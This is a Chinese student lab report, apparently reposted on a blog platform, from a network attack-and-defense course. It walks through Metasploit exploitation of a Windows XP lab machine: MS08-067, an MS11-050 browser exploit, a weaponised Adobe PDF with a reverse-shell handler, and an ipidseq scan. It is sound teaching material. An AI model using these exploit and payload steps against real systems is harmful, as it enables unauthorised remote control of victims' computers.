20155338 《网络攻防》Exp5 MSF基础应用

最新推荐文章于 2024-09-12 22:54:45 发布
最新推荐文章于 2024-09-12 22:54:45 发布
阅读量159 收藏
点赞数
文章标签: shell 运维 操作系统
原文链接:http://www.cnblogs.com/Hdywan/p/8970751.html
版权

20155338 《网络攻防》Exp5 MSF基础应用

基础问题回答

1、 用自己的话解释什么是exploit,payload,encode?

  • exploit将真正要负责攻击的代码传送到靶机中,相当于载具
  • payload负责执行相应的攻击代码,相当于载荷
  • encode是伪装,为了避免payload中坏字符影响功能,相当于编码

实验过程

Windows服务渗透攻击——MS08-067安全漏洞
  • 攻击机:kali,ip:172.30.6.185

  • 靶机:windows XP SP3,IP地址是172.30.7.99

  • msfconsole进入msf,再用search ms08_067查询一下针对该漏洞的攻击模块:
    1071544-20180429115943208-622870405.png

  • use exploit/windows/smb/ms08_067_netapi使用该模块,并用show targets查看可以被攻击的靶机的操作系统型号:

1071544-20180429115950681-1670178772.png

  • show payloads查看可以供我们使用的攻击载:
    1071544-20180429120000313-562079003.png

  • 从中找到一个可用的攻击载荷generic/shell_reverse_tcp,用set payload generic/shell_reverse_tcp设置payload:

1071544-20180429120010034-1720991562.png

  • show options查看需要设置的参数:

1071544-20180429120016686-2133840622.png

  • 这里需要设置RHOST(靶机IP)和LHOST(Kali的IP),使用set 需设置的参数名 参数值命令即可设置,并设置target选项目标(例如我攻击系统为WIN xp 中文简体 SP3,所以选择34)

1071544-20180429120025977-148950126.png

  • show options确认需要设置的参数是否已经设置好:

1071544-20180429120036116-503142214.png

  • 确认参数设置无误后,用exploit指令开始攻击:

1071544-20180429120043056-650934501.png

  • 攻击成功后会获取靶机的shell,可以对其进行操作:

1071544-20180429120050016-1611716115.png

针对浏览器的攻击:ms11_050
  • search ms11_050查询一下针对该漏洞的攻击模块,并用use windows/browser/ms11_050_mshtml_cobjectelement使用该模块:

1071544-20180429120058951-927902060.png

  • 用info查看该模块的相关信息

1071544-20180429120108153-1723116034.png

  • targets信息:

1071544-20180429120116964-1385389713.png

  • options信息:

1071544-20180429120125354-252677535.png

  • set payload windows/meterpreter/reverse_tcp设置payload,并设置需要设置的参数。

1071544-20180429120133866-702887155.png

  • show options确认需要设置的参数是否已经设置好:

1071544-20180429120142961-612270279.png

  • 确认参数设置无误后,用exploit指令开始攻击,攻击成功后会有靶机需要访问的网址:

1071544-20180429120151554-1873177608.png

  • 在靶机IE上输入该网址:

1071544-20180429120200150-374764215.png

  • kali中显示session已经创建,输入sessions -i 1,获取靶机的shell,可以对其进行操作

1071544-20180429120208758-500487703.jpg

针对客户端的攻击:adobe_toolbutton
  • search adobe查询一下针对该漏洞的攻击模块:

1071544-20180429120217616-1376739619.png

  • 选择一个模块并使用该模块:

1071544-20180429120225121-19531168.png

  • show targets查看可以被攻击的靶机的操作系统型号:

1071544-20180429120233963-905769765.png

  • 设置payload攻击载荷,命令set payload windows/meterpreter/reverse_tcp,设置相应参数,实施exploit攻击,发现在/root/.msf4/local/目录下成功生成了一个csj5338.pdf文件:

1071544-20180429120242802-859841539.png

1071544-20180429120250473-786294480.png

  • 将pdf文件粘贴到靶机win XP

1071544-20180429120258177-591493601.png

  • 在kali中和前几次实验一样打开并设置监听模块use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp,再设置IP以及端口

1071544-20180429120305695-365599798.png

  • 在靶机上打开刚刚那个pdf文件,可以观察到Kali成功获取了靶机的shell,可以对其进行操作:

1071544-20180429120313147-1702183119.png

应用一个辅助模块:ipidseq
  • show auxiliary查看所有辅助模块,并选择其中的一个,选的是scanner/ip/ipidseq

1071544-20180429120321043-1746111418.png

1071544-20180429120328530-922745671.png

  • 查看需要设置的参数,设置完成后确认一下,这里可以进行对单一目标主机的扫描,然后就可以开始exploit了。

1071544-20180429120336530-2059741408.png

1071544-20180429120343237-1187949341.png

  • 也可以对指定网段的主机进行扫描:

1071544-20180429120351718-891567322.png

实验总结和收获

这次实验总体流程不算难,但在虚拟机上面我换了很多个,换了几个镜像,总算是用简体中文版成功了,学会了MSF工具的一些常用指令,也认识到在实际的渗透过程中,我们不能完全依靠msf来实现,漏洞也都是很早之前的漏洞,其实在现实生活中中攻击一台计算机还是有一定难度的。还是应该深入学习,加强自己的专业技能。

转载于:https://www.cnblogs.com/Hdywan/p/8970751.html

weixin_30500473
关注
20155318 《网络攻防Exp5 MSF基础应用
04-28 177
20155318 《网络攻防Exp5 MSF基础应用 基础问题 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码传送到靶机中 payload也就相当于载荷,相当于我们之前实验的后门,exploit把它传送到靶机中后,它就负责执行相应的攻击代码。 encode也就是编码,主要是为了避免payload中坏字符影响功能...
2018-2019-2 20165206 网络攻防技术 Exp5 MSF基础应用
weixin_33748818的博客
04-15 399
- 2018-2019-2 20165206《网络攻防技术》Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050;(1分) 1.3 一个针对客户端的攻击,如Adobe;(1分) 1.4 成功应用任何一个辅助模块。(0.5分) 以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除...
20145307陈俊达《网络对抗》Exp5 MSF基础应用
04-13 198
20145307陈俊达《网络对抗》Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,各式各样的漏洞在exploit上进行配置 payload也就相当于载荷,相当于在exploit上创建好了之后在靶机上运行,回连 encode是编码,是为了避免payload中出现坏字符,影响payload的功能,其次是...
2018-2019-2 20165212《网络攻防技术》Exp5 MSF基础应用
weixin_30794499的博客
04-19 149
2018-2019-2 20165212《网络攻防技术》Exp5 MSF基础应用 攻击成果 主动攻击的实践 ms17010eternalblue payload windows/x64/meterpreter/reverse_tcp(成功) payload generic/shellreversetcp(成功) ms17010psexec(成功且唯一) 攻击浏...
2018-2019-2 20165315《网络攻防技术》Exp5 MSF基础应用
weixin_34401479的博客
04-16 182
2018-2019-2 20165315《网络攻防技术》Exp5 MSF基础应用 目录 一、实验内容 二、实验步骤 1、一个主动攻击实践 ms08_067(成功) 2、一个针对浏览器的攻击,如ms11_050; ms11_050(成功) 3、一个针对客户端的攻击,如Adobe; Adobe(尚未成功,任需努力) Wireshark(成功) 4、成功应用任何一个辅助模块 sniffe...
2018-2019-2 20165329《网络攻防技术》Exp5 MSF基础应用
weixin_30800987的博客
04-20 149
2018-2019-2 20165329《网络攻防技术》Exp5 MSF基础应用 一、实验 一个主动攻击实践,ms08_067 ; 一个针对浏览器的攻击,MS11-050 ; 一个针对客户端的攻击,Adobe ; 成功应用任何一个辅助模块(唯一)。 离实战还缺些什么技术感觉大部分是按照教程来做的,离实战还很遥远 用自己的话解释什么是exploit,payload,encode.exp...
20154307《网络对抗》Exp5 MSF基础应用
weixin_30455023的博客
04-17 208
2014107《网络对抗》Exp5 MSF基础应用 一、基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit是利用一切可以利用的工具、采用一切可以采用的方法、找到一切可以找到的漏洞,并对漏洞进行分析,从而达到攻击手段。 payload是被送到靶机上负责攻击的代码 encode是编码,可以修改payload中的坏字符,也可以通过一些手法改变病毒的特征码,让...
# 2018-2019-2 20165115 《网络攻防Exp5 MSF基础应用 #
weixin_30246221的博客
04-13 126
2018-2019-2 20165115 《网络攻防Exp5 MSF基础应用 目录 一、知识点回顾与问题回答 二、实验步骤 主动攻击实践 ms08_067 针对浏览器的攻击 ms10_046 adobe相关渗透模块 adobe_toolbutton 辅助模块的使用 通过auxiliary/scanner/smtp/smtp_enum批量扫描主机中是否有开放的端口(特殊) 三、实验中遇到的...
网络靶场攻防综合实验
weixin_46605806的博客
12-20 6981
目录一,靶场环境搭建1.1,网络拓扑结构图1.2,搭建简易的网络攻防实验靶场环境,包括:1.3,网络靶场攻击渗透测试,包括:1.4,网络靶场攻击检测二,靶场的搭建与攻击渗透测试2.1,Honeyd2.1.1,honeyd概述2.1.2,honeyd所依赖的函数库2.1.3,搭建honeyd2.1.4,编写honeyd的配置文件2.1.5,启动honeyd2.1.6,检查honeyd搭建情况2.2,具有“永恒之黑”CVE-2020-0796漏洞的虚拟主机2.2.1,漏洞概述2.2.2,复现环境2.2.3,漏洞
红队内网攻防渗透:内网渗透之windows内网权限提升技术:哥斯拉&MSF&CS
HACKONE的博客
05-30 487
虚拟化:Docker,ESXi,QEMU,Hyper-V等。jsp由于机制的原因不需要提权,一般拿到的权限就是最高权限。目前的msf版本有bug可以TB上购买pro版本嘎嘎稳。集成软件:宝塔,PhpStudy,XAMMP等。ASP/ASP.NET/PHP/JSP等。全自动:快速识别系统中可能被利用的漏洞。自行搭建:自己一个个下载安装搭建配置。集成软件,自行搭建,虚拟化等。执行不了命令,所以需要提权。
20221902 2022-2023-2 《网络攻防实践》第六次作业
xiannvyeye的博客
04-15 366
MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。在Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。防火墙最佳做法和标准的默认防火墙配置,有助于保护网络资源免受从企业外部发起的攻击,默认情况下能建立空连接。
MSF之漏洞复现
mackilo的博客
11-08 8425
ms10-018漏洞,它是IE浏览器漏洞,可以通过该漏洞获取目标主机的控制权。最严重的漏洞可能在用户使用IE浏览器查看特制网页时允许执行远程代码。详细信息。
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4481
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
vulhub远程执行命令漏洞CVE-2022-22963
qq_65852138的博客
09-08 292
vulhub远程执行命令漏洞CVE-2022-22963
瑞芯微RK3568鸿蒙开发板OpenHarmony系统修改cfg文件权限方法
Industio_CSDN的博客
09-11 367
本文适用于OpenHarmony开源鸿蒙系统修改cfg文件权限方法,深圳触觉智能研发的RK3566、RK3568、RK3588等开发板、主板等产品均适用此教程
chsh:修改默认shell
qq_38641599的博客
09-12 398
本文详细介绍 Linux chsh命令的详细用法。
【Linux取经之路】用户&权限管理
最新发布
bit_pan的博客
09-12 515
事先,我已经将home目录的权限改为777,也就是说所有用户都具有这个目录的写(w)权限,并且在该目录下,我以root的身份创建了一个名为test的文件,然后我从root切换到普通用户pcz,接着尝试删除root在home目录下创建的文件test,结果还删除的很成功!首先,我创建了一个名为test的文件,我们可以看到,test的所有者和所属组为pcz,所有者对应的权限为rw-,可读可写不可执行,所属组对应的权限为rw-,可读可写不可执行。当我们以普通用户的身份安装软件包的时,往往权限不够,需要提权。
shell脚本之双重循环(详解)
qq_71371157的博客
09-12 1065
双重循环是指在程序中嵌套使用两个循环结构,通常是嵌套使用两个for循环。双重循环可以用来遍历二维数组、二维矩阵等需要两个维度的数据结构,并且可以对其中的元素进行操作。双重循环的执行方式是外层循环执行一次,内层循环执行完整的循环体,然后再次回到外层循环,如此循环执行,直至外层循环完毕。在实际应用中,双重循环经常用于处理二维数组或嵌套数据结构。它可以用于遍历矩阵、搜索匹配项、计算累加值等等。双重循环的效率可能会比较低,因为它需要执行更多的迭代。因此,在设计算法时,需要权衡迭代次数和执行时间。执行示例。
MSF基础与团队模型详解:原则、应用与CMMI比较
在实际课程中,MSF的培训通常会通过案例研究、讨论和实践活动来深入讲解这些概念,并鼓励参与者将理论应用到实际工作中。通过讨论,学员可以理解一个优秀的项目团队应具备的特点,如良好的沟通、明确的目标导向、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值